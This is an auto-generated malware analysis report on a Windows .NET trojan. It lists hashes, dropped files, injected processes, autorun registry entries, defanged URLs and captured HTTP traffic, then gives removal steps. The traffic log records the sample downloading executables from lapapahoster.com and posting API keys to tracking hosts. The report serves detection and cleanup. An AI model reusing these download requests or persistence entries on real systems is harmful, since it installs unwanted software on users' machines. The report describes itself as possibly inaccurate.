Trojan.MSIL.Agent.CLS_19e3b36f34
Trojan.MSIL.Agent.CLS (BitDefender), VirTool:MSIL/Injector (Microsoft), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.DownLoader25.742 (DrWeb), Trojan.MSIL.Agent.CLS (B) (Emsisoft), GenericRXBW-DU!19E3B36F3494 (McAfee), Trojan.Gen (Symantec), Trojan.MSIL.Crypt (Ikarus), Trojan.MSIL.Agent.CLS (FSecure), Win32:Malware-gen (AVG), Win32:Malware-gen (Avast), TROJ_GEN.R08NC0DFS17 (TrendMicro), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, VirTool, Malware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 19e3b36f349412e88daa21153ce09b11
SHA1: e2567ef57e36e853cd80d09a502430551b340d75
SHA256: ffeb89d627c252f96244d184c752f7ac120f3970f28ae86ae4dc8cd7a5bf1f29
SSDeep: 6144:7nQgKlFzmrcv9uZgimfBmhGhqsW9rttGvo8IsSIdjfEDjxKwALxPHuok/3ifD:slFSi9uZAf4h8q97GQ8IrDJixPuP3ifD
Size: 340480 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-06-28 03:10:35
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:3604
AfficheOne.exe:2272
Era5Le.exe:4064
Like.exe:2172
The Trojan injects its code into the following process(es):
i3dhyoluabb.exe:2276
%original file name%.exe:4020
UGRWL2XSH.exe:1636
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:4020 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\10LV1RKEX2\Like.exe.config (1 bytes)
C:\config.conf (62 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\10LV1RKEX2\Like.exe (130758 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\10LV1RKEX2\AfficheOne.exe (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\10LV1RKEX2\Era5Le.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\10LV1RKEX2\AfficheOne.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\10LV1RKEX2\Era5Le.exe (20675 bytes)
The process UGRWL2XSH.exe:1636 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\UGRWL2XSHI\cast.config (37 bytes)
The process AfficheOne.exe:2272 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (868 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (868 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\k4n1pqkyz3z\i3dhyoluabb.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\k4n1pqkyz3z\i3dhyoluabb.exe (208 bytes)
The process Era5Le.exe:4064 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\UGRWL2XSHI\uninstaller.exe.config (1 bytes)
%Program Files%\UGRWL2XSHI\UGRWL2XSH.exe.config (1 bytes)
%Program Files%\UGRWL2XSHI\UGRWL2XSH.exe (65121 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (852 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (852 bytes)
%Program Files%\UGRWL2XSHI\uninstaller.exe (4646 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (852 bytes)
The Trojan deletes the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.4064.1496689 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.4064.1496689 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.4064.1496704 (0 bytes)
The process Like.exe:2172 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (844 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (844 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (844 bytes)
The Trojan deletes the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2172.1499840 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2172.1499840 (0 bytes)
Registry activity
The process i3dhyoluabb.exe:2276 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"kxmpfu4ih3u" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\k4n1pqkyz3z\i3dhyoluabb.exe"
The process %original file name%.exe:4020 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\19e3b36f349412e88daa21153ce09b11_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\19e3b36f349412e88daa21153ce09b11_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\19e3b36f349412e88daa21153ce09b11_RASAPI32]
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\19e3b36f349412e88daa21153ce09b11_RASMANCS]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\19e3b36f349412e88daa21153ce09b11_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\19e3b36f349412e88daa21153ce09b11_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\19e3b36f349412e88daa21153ce09b11_RASAPI32]
"EnableConsoleTracing" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_3TCY2" = "C:\%original file name%.exe"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process %original file name%.exe:3604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process UGRWL2XSH.exe:1636 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\UGRWL2XSH_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\UGRWL2XSH_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\UGRWL2XSH_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\UGRWL2XSH_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\UGRWL2XSH_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\UGRWL2XSH_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\UGRWL2XSH_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\UGRWL2XSH_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\UGRWL2XSH_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\UGRWL2XSH_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\UGRWL2XSH_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\UGRWL2XSH_RASAPI32]
"ConsoleTracingMask" = "4294901760"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"9MB0X2MTSJK0LGC" = "%Program Files%\UGRWL2XSHI\UGRWL2XSH.exe"
The process AfficheOne.exe:2272 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\AfficheOne_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\AfficheOne_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\AfficheOne_RASAPI32]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\AfficheOne_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\AfficheOne_RASMANCS]
"EnableFileTracing" = "0"
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\AfficheOne_RASAPI32]
"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\AfficheOne_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\AfficheOne_RASAPI32]
"ConsoleTracingMask" = "4294901760"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process Era5Le.exe:4064 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\Era5Le_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\Era5Le_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\Era5Le_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\Era5Le_RASMANCS]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\Era5Le_RASMANCS]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\Era5Le_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\Era5Le_RASMANCS]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process Like.exe:2172 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\Like_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\Like_RASMANCS]
"FileTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\Like_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\Like_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\Like_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\Like_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\Like_RASAPI32]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"
Dropped PE files
| MD5 | File path |
|---|---|
| b52b8e68a402314a2b93b2bf62bb9b0a | c:\Program Files\UGRWL2XSHI\UGRWL2XSH.exe |
| feab31fd4ccd4ef03c01ac4915485843 | c:\Program Files\UGRWL2XSHI\uninstaller.exe |
| 0e94d32f9913e36c636107c915e2d256 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\10LV1RKEX2\AfficheOne.exe |
| 5129835550b63eb92bd50afb4289cf99 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\10LV1RKEX2\Era5Le.exe |
| 5704ea6ce7192515d0bf41d82220c4e3 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\10LV1RKEX2\Like.exe |
| e31b5dc7c12fbb344fdf9e4db1946c45 | c:\Users\"%CurrentUserName%"\AppData\Roaming\k4n1pqkyz3z\i3dhyoluabb.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: T@
Product Name:
Product Version: 0.0.4.7
Legal Copyright: Copyright (c) 6610
Legal Trademarks:
Original Filename: SanJer66.exe
Internal Name: SanJer66.exe
File Version: 0.0.4.7
File Description: T@QG@
Comments:
Language: German (Germany)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 8192 | 334660 | 334848 | 4.20182 | 71126a674a48d1e22e69c6a471327567 |
| .rsrc | 344064 | 4432 | 4608 | 3.49132 | 563e801812acaf94f7948814597924b5 |
| .reloc | 352256 | 12 | 512 | 0.070639 | 477861516b65fa139da34a102b43a27a |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://www.wizzmonetize.com/remotes_xml_sections.php | |
| hxxp://lapapahoster.com/from_backup/AdsShow_installer.exe | |
| hxxp://lapapahoster.com/download/3/wizzcaster_installer_v2.exe | |
| hxxp://lapapahoster.com/get/4/updater.exe | |
| hxxp://lapapahoster.com/safe_download/582369/AdsShow.exe | |
| hxxp://lapapahoster.com/download/3/wizzcaster_v2.exe | |
| hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load | |
| hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok | |
| hxxp://lapapahoster.com/download/3/wizzcaster_uninstaller_v2.exe | |
| hxxp://www.wizzmonetize.com/api/v5/config | |
| hxxp://wizzcaster.com/api/v5/config | |
| hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok | |
| hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load | |
| dns.msftncsi.com | |
| teredo.ipv6.microsoft.com | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY PE EXE or DLL Windows file download HTTP
Traffic
GET /safe_download/582369/AdsShow.exe HTTP/1.1
Host: lapapahoster.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 30 Jun 2017 10:08:46 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
<<< binary PE body skipped >>>
POST /remotes_xml_sections.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.wizzmonetize.com
Content-Length: 169
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47a47968c&buying_product_name=DefaultProduct&buying_partner_name=DefaultPartner&buying_channel_name=1
HTTP/1.1 200 OK
Date: Fri, 30 Jun 2017 10:08:33 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=jr16pos8juhvat7njers9glfs4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1644
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<<< base64-encoded response body skipped >>>
POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: wizzcaster.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive
uid=57a764d042bf8&days_after_install=0
HTTP/1.1 100 Continue
HTTP/1.1 200 OK
Date: Fri, 30 Jun 2017 10:08:54 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=b309e258715f8ca91836ca2a05c8ae87307acd2b; expires=Fri, 30-Jun-2017 12:08:54 GMT; Max-Age=7200; path=/; httponly
Content-Length: 28
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"time_between_prints":"15"}
GET /from_backup/AdsShow_installer.exe HTTP/1.1
Host: lapapahoster.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 30 Jun 2017 10:08:39 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow_installer.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
<<< binary PE body skipped >>>
GET /download/3/wizzcaster_installer_v2.exe HTTP/1.1
Host: lapapahoster.com
HTTP/1.1 200 OK
Date: Fri, 30 Jun 2017 10:08:40 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_installer_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
<<< binary PE body skipped >>>
GET /get/4/updater.exe HTTP/1.1
Host: lapapahoster.com
HTTP/1.1 200 OK
Date: Fri, 30 Jun 2017 10:08:41 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="updater.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
<<< binary PE body skipped >>>
GET /download/3/wizzcaster_v2.exe HTTP/1.1
Host: lapapahoster.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 30 Jun 2017 10:08:48 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
<<< binary PE body skipped >>>
GET /download/3/wizzcaster_uninstaller_v2.exe HTTP/1.1
Host: lapapahoster.com
HTTP/1.1 200 OK
Date: Fri, 30 Jun 2017 10:08:51 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_uninstaller_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
<<< binary PE body skipped >>>
POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
api_key=fa02609b-2368-11e6-922f-0cc47a47968c
HTTP/1.1 200 OK
Date: Fri, 30 Jun 2017 10:08:50 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=kjq0mjfh0hbmqd81se32s4h3m5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}
POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
HTTP/1.1 100 Continue
api_key=fa02609b-2368-11e6-922f-0cc47a47968c
HTTP/1.1 200 OK
Date: Fri, 30 Jun 2017 10:08:50 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=gg03udqv5c7e14b7laf4snoir1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}
The Trojan connects to the servers at the following location(s):
%6sl^?
%1sl^
UGRWL2XSH.exe_1636_rwx_002D0000_0000F000:
.UolP
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:3604
AfficheOne.exe:2272
Era5Le.exe:4064
Like.exe:2172
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\10LV1RKEX2\Like.exe.config (1 bytes)
C:\config.conf (62 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\10LV1RKEX2\AfficheOne.exe (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\10LV1RKEX2\Era5Le.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\10LV1RKEX2\AfficheOne.exe.config (1 bytes)
%Program Files%\UGRWL2XSHI\cast.config (37 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (868 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (868 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\k4n1pqkyz3z\i3dhyoluabb.exe.config (1 bytes)
%Program Files%\UGRWL2XSHI\uninstaller.exe.config (1 bytes)
%Program Files%\UGRWL2XSHI\UGRWL2XSH.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (852 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"kxmpfu4ih3u" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\k4n1pqkyz3z\i3dhyoluabb.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_3TCY2" = "C:\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"9MB0X2MTSJK0LGC" = "%Program Files%\UGRWL2XSHI\UGRWL2XSH.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.